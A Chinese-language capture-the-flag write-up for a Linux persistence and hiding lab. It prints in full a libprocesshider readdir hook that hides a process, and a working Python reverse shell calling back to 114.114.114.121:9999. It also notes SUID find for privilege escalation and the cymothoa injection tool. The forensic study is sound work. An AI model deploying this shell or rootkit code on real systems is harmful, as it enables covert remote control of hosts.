第三章 权限维持-linux权限维持-隐藏-玄机靶场


linux权限维持玄机靶场自用笔记。

题目简介

1.黑客隐藏的隐藏的文件 完整路径md5
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
3.黑客提权所用的命令 完整路径的md5 flag{md5}
4.黑客尝试注入恶意代码的工具完整路径md5
5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

1.黑客隐藏的隐藏的文件 完整路径md5

进入后查看，发现 vim 的记录文件 .viminfo，读取它发现几个有意思的路径：

Command Line History (newest to oldest):
:q!
:q
:wq

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Input Line History (newest to oldest):

# Registers:

# File marks:
'0 1 0 /tmp/.temp/libprocesshider/1.py
'1 4 0 /tmp/.temp/libprocesshider/1.py
'2 12 40 /tmp/.temp/libprocesshider/processhider.c
'3 24 47 /tmp/.temp/libprocesshider/1.py
'4 2 1 /var/www/html/sh.php

发现 libprocesshider 是一个 Linux 持久化访问（隐藏进程）工具，1.py 则是它要隐藏的进程（processhider.c 中 process_to_filter = "1.py"）。对完整路径 /tmp/.temp/libprocesshider/1.py 做 md5，提交 flag{109ccb5768c70638e24fb46ee7957e37}

2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}

进行分析/tmp/.temp/libprocesshider/下的文件:

root@xuanji:~# cat /tmp/.temp/libprocesshider/processhider.c
#define _GNU_SOURCE   /* exposes RTLD_NEXT in <dlfcn.h>, used by the readdir hook below */

#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>

/*
* Every process with this name will be excluded
*
* Analyst note: this is the value the hooked readdir() compares each
* /proc/<pid> entry's comm field against. "1.py" is the script that sits
* in the same directory and opens the reverse shell, so the library's
* purpose is to keep that process out of directory listings of /proc
* (which is what ps and similar tools read). Treat this string as the IoC
* that ties the hook to the hidden process.
*/
static const char* process_to_filter = "1.py";

/*
* Get a directory name given a DIR* handle
*
* Resolves the stream's path through /proc/self/fd/<fd> so the hook can
* tell whether the directory being read is /proc. On success writes the
* NUL-terminated path into buf and returns 1; returns 0 if dirfd() or
* readlink() fails.
*
* NOTE(review): readlink() does not NUL-terminate and may return exactly
* `size`; in that case buf[ret] = 0 writes one byte past the end of buf.
* The safe call is readlink(tmp, buf, size - 1).
*/
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }

    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);   /* no terminator appended by readlink */
    if(ret == -1) {
        return 0;
    }

    buf[ret] = 0;
    return 1;
}

/*
* Get a process name given its pid
*
* pid is a /proc directory entry name; only all-digit names are treated as
* processes. Reads the first line of /proc/<pid>/stat and copies the
* parenthesised comm field into buf. Returns 1 on success, 0 if pid is not
* numeric or the stat file cannot be opened/read.
*
* NOTE(review): the sscanf() result is not checked, so if the line does not
* match "%d (" buf is left uninitialised and the caller's strcmp() reads
* garbage. The trailing 's' in the format is a literal character, not part
* of the %[^)] conversion, and the conversion carries no width limit.
*/
static int get_process_name(char* pid, char* buf)
{
    if(strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);

    FILE* f = fopen(tmp, "r");
    if(f == NULL) {
        return 0;
    }

    /* tmp is reused: the path is overwritten with the first stat line. */
    if(fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }

    fclose(f);

    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);   /* comm field, up to the closing ')' */
    return 1;
}

/*
* DECLARE_READDIR(dirent, readdir)
*
* Expands to an interposing definition of `readdir` (readdir / readdir64).
* The first call resolves the real libc function with dlsym(RTLD_NEXT);
* every call then loops over the real entries and skips any entry that is
* (a) inside /proc and (b) a pid whose comm equals process_to_filter.
* All other entries, and every directory other than /proc, pass through
* unchanged, which is why only the one process disappears from
* readdir-based listings while everything else looks normal.
*
* Analyst notes:
*  - The `dirent` parameter is substituted into `struct dirent*`, so the
*    readdir64 expansion really returns struct dirent64*.
*  - dlsym(RTLD_NEXT, ...) only resolves the next libc symbol when this
*    object is loaded ahead of libc in the same process (typically via a
*    preload mechanism); how it was loaded on this host is not shown here.
*  - A dlsym failure only prints to stderr; original_##readdir stays NULL
*    and the call inside the loop would dereference it.
*  - Defensive check: compare ps / ls /proc output with a pid enumeration
*    that does not go through the hooked libc call, and review the
*    preload configuration for this library.
*/
#define DECLARE_READDIR(dirent, readdir) \
static struct dirent* (*original_##readdir)(DIR*) = NULL; \
\
struct dirent* readdir(DIR *dirp) \
{ \
    if(original_##readdir == NULL) { \
        original_##readdir = dlsym(RTLD_NEXT, #readdir); /* real libc symbol */ \
        if(original_##readdir == NULL) \
        { \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror()); \
        } \
    } \
\
    struct dirent* dir; \
\
    while(1) \
    { \
        dir = original_##readdir(dirp); \
        if(dir) { \
            char dir_name[256]; \
            char process_name[256]; \
            /* drop the entry only when it is /proc/<pid> and comm matches */ \
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
               strcmp(dir_name, "/proc") == 0 && \
               get_process_name(dir->d_name, process_name) && \
               strcmp(process_name, process_to_filter) == 0) { \
                continue; \
            } \
        } \
        break; \
    } \
    return dir; \
}

/* Hook both the 64-bit and the classic entry point. */
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
root@xuanji:~#
root@xuanji:~# cat /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3
# Analyst note: this is the process the libprocesshider hook hides (its comm
# is "1.py"). It daemonises itself and then loops forever trying to open a
# reverse shell to a hard-coded address; the netstat output later in the
# writeup shows the resulting SYN_SENT connections.

import socket,subprocess,os,sys, time

# First fork: the parent exits so the launching shell returns at once and
# the child is re-parented.
pidrg = os.fork()
if pidrg > 0:
    sys.exit(0)

# Detach from the controlling terminal and drop cwd / umask dependencies
# (double-fork daemonisation).
os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
    sys.exit(0)

while 1:
    try:
        # Silence the daemon's own stdout/stderr.
        sys.stdout.flush()
        sys.stderr.flush()
        fdreg = open("/dev/null", "w")
        sys.stdout = fdreg
        sys.stderr = fdreg
        # Hard-coded callback address and port -- the IoC for question 2.
        sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sdregs.connect(("114.114.114.121",9999))
        # fds 0/1/2 are bound to the socket, so the interactive bash below
        # reads its commands from, and writes its output to, the remote end.
        os.dup2(sdregs.fileno(),0)
        os.dup2(sdregs.fileno(),1)
        os.dup2(sdregs.fileno(),2)
        p=subprocess.call(["/bin/bash","-i"])
        sdregs.close()
    except Exception:
        # Any failure (e.g. the connect not completing) is swallowed ...
        pass
    # ... and retried every 2 s, which is why several half-open connections
    # to the same address accumulate in netstat.
    time.sleep(2)
root@xuanji:~#

在 1.py 中发现 sdregs.connect(("114.114.114.121",9999))，即反弹 shell 的目标地址与端口，flag{114.114.114.121:9999}

3.黑客提权所用的命令

用命令 find / -perm -u=s -type f 2>/dev/null 查找带 SUID 位的文件，排查 suid 提权：

root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device

发现 find 带有 SUID 位，可以用来提权：

image-20240708223713030

故 flag 为 /usr/bin/find 的 md5，提交 flag{7fd5884f493f4aaf96abee286ee04120}

4.黑客尝试注入恶意代码的工具

执行find / -name '.*'查询隐藏文件。

/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile

/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/opt/.cymothoa-1-beta

发现一个奇怪的目录/opt/.cymothoa-1-beta,cd 进去发现是一个工具目录:

root@xuanji:/opt/.cymothoa-1-beta# ls
Makefile bgrep.c cymothoa cymothoa.h payloads personalization.h syscalls.txt udp_server.c
bgrep core cymothoa.c hexdump_to_cstring.pl payloads.h syscall_code.pl udp_server

查询发现 cymothoa 是一个向进程注入后门代码的工具。

![image-20240708230421498](/Users/lexs/Library/Application Support/typora-user-images/image-20240708230421498.png)

故对完整路径 /opt/.cymothoa-1-beta/cymothoa 做 md5，提交 flag{087c267368ece4fcf422ff733b51aed9}

5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec** 值 作为flag提交

Cat 查看1.py:

root@xuanji:/opt/.cymothoa-1-beta# cat /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3

import socket,subprocess,os,sys, time

发现 shebang 是 “#!/usr/bin/python3”，即用 python3 运行 1.py：

root@xuanji:~# python3 /tmp/.temp/libprocesshider/1.py
root@xuanji:~# netstat -alntp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 11/apache2
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 10/sshd
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 1 10.244.6.152:46896 114.114.114.121:9999 SYN_SENT 19439/python3
tcp 0 1 10.244.6.152:48628 114.114.114.121:9999 SYN_SENT -
tcp 0 0 10.244.6.152:22 10.244.0.1:63226 ESTABLISHED 393/1
tcp 0 1 10.244.6.152:48618 114.114.114.121:9999 SYN_SENT -
tcp 0 1 10.244.6.152:40544 114.114.114.121:9999 SYN_SENT -
tcp 0 0 10.244.6.152:22 10.244.0.1:4984 ESTABLISHED 9187/sshd: root@not
tcp6 0 0 :::22 :::* LISTEN 10/sshd
root@xuanji:~# whereis /python3
python3: /usr/bin/python3 /usr/bin/python3.4 /usr/bin/python3.4m /etc/python3 /etc/python3.4 /usr/lib/python3 /usr/lib/python3.4 /usr/local/lib/python3.4 /usr/share/python3 /usr/share/man/man1/python3.1.gz
root@xuanji:~#ls -lab /usr/bin/python3
lrwxrwxrwx. 1 root root 9 Mar 23 2014 /usr/bin/python3 -> python3.4

用 whereis 查询 python3 的位置，再用 ls -l 查看发现 /usr/bin/python3 是符号链接，指向 /usr/bin/python3.4

按题目要求提供完整的执行程序为flag :flag{/usr/bin/python3.4}
